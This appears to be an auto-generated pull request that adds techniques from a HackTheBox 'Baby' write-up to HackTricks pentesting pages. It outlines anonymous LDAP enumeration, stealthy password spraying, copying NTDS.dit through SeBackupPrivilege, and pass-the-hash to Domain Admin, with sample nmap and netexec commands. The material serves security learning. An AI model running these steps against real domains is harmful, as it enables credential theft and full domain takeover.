HTB Baby — Anonymous LDAP → Password Spray → SeBackupPrivile...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2025/09/19/htb-baby.html
• Blog Title: HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin
• Suggested Section: Active Directory -> Enumeration (LDAP Anonymous Bind, Password Spraying) and Privilege Escalation -> Backup Operators / SeBackupPrivilege -> Dumping NTDS.dit and PTH

🎯 Content Summary

Target: HTB “Baby” (Windows Server 2022 DC). Hostname: BABYDC; Domain: baby.vl. Easy AD path: Anonymous LDAP enumeration → find a default credential → password spray → account compromise → abuse Backup Operators / SeBackupPrivilege to dump NTDS.dit → PTH to Domain Admin shell.

Recon

nmap -p- -vvv --min-rate 10000 10.129.20.55
nmap -p 53,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.20.55🔧 Technical Details
Anonymous LDAP reconnaissance for targeted spraying. If null-bind LDAP is allowed, query (objectClass=*) or (sAMAccountName=*) at the domain root to list users, OUs, and groups. Harvest sAMAccountName, memberOf, and metadata (pwdLastSet, userAccountControl) to assemble a precise username list and infer onboarding/default password conventions that can be sprayed at low rate.
Credential spraying across multiple protocols. Use NetExec to spray a discovered default password against the enumerated sAMAccountName set, then validate hits on SMB and WinRM. Keep spray slow and honor lockout windows to remain stealthy.
Abusing SeBackupPrivilege for domain secret theft. With Backup Operators / SeBackupPrivilege, use backup-mode reads or VSS to copy C:\Windows\NTDS\ntds.dit and the SYSTEM hive despite restrictive ACLs. Extract domain ...
🤖 Agent Actions
I analyzed the blog and the HackTricks repository, and I found the best places to integrate the techniques covered:

Anonymous LDAP null-bind enumeration and targeted user harvesting
Password spraying with NetExec across SMB/WinRM with operational safety notes
Abusing SeBackupPrivilege/Backup Operators to copy NTDS.dit and SYSTEM, then post-extraction Pass-the-Hash to DA with NetExec

What I updated

network-services-pentesting/pentesting-ldap.md


Added a new subsection under “Anonymous Access”:

“Anonymous LDAP enumeration with NetExec (null bind)” showing:

netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
awk extraction of sAMAccountName into users.txt


Notes on which attributes to collect (sAMAccountName, memberOf, pwdLastSet, userAccountControl) and null-bind behavior.


Added a “References” section at the bottom including:

The blog post
NetExec repo
Microsoft anonymous LDAP binds doc




windows-hardening/active-directory-methodology/password-spraying.md


Added a new “Using NetExec (CME successor)” bullet in “Exploitation from Linux (or all)”:

hosts file generation to ensure FQDN and Kerberos resolution
SMB spray with --continue-on-success --no-bruteforce
WinRM validation with -x whoami
Time sync tip with sudo ntpdate <DC_FQDN>


Updated “References” with the blog post link.


windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md


In the “Backup Operators” → “AD Attack” flow, after secretsdump.py:

Added step “Post-extraction: Pass-the-Hash to DA” with:

netexec winrm -u Administrator -H <ADMIN_NT_HASH>
netexec smb ... --exec-method smbexec




Updated the “References” with the blog post link.

Reasoning and fit

LDAP null bind enumeration fits perfectly in the general LDAP page under “Anonymous Access”; adding NetExec examples complements existing ldapsearch examples and aligns with current tooling.
Password spraying enhancements (NetExec workflow, WinRM validation, time sync reminders) belong in the AD methodology “Password Spraying” page, which already shows other tools and operational considerations.
The SeBackupPrivilege abuse path already existed under “Backup Operators”; adding “Post-extraction PTH with NetExec” makes the end-to-end chain explicit and modernizes the examples with commonly used tooling. The rest of the NTDS.dit extraction methods remain intact.

No duplicate pages were created, and all updates maintain the existing structure and style. Each modified file includes the blog URL in a single “References” section at the end.

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
🗑️ File Cleanup

searchindex.js removed: This auto-generated file has been removed to prevent conflicts.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/09/19/htb-baby.html

Content Categories: Based on the analysis, this content was categorized under "Active Directory -> Enumeration (LDAP Anonymous Bind, Password Spraying) and Privilege Escalation -> Backup Operators / SeBackupPrivilege -> Dumping NTDS.dit and PTH".

Repository Maintenance:

• MD Files Formatting: 876 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0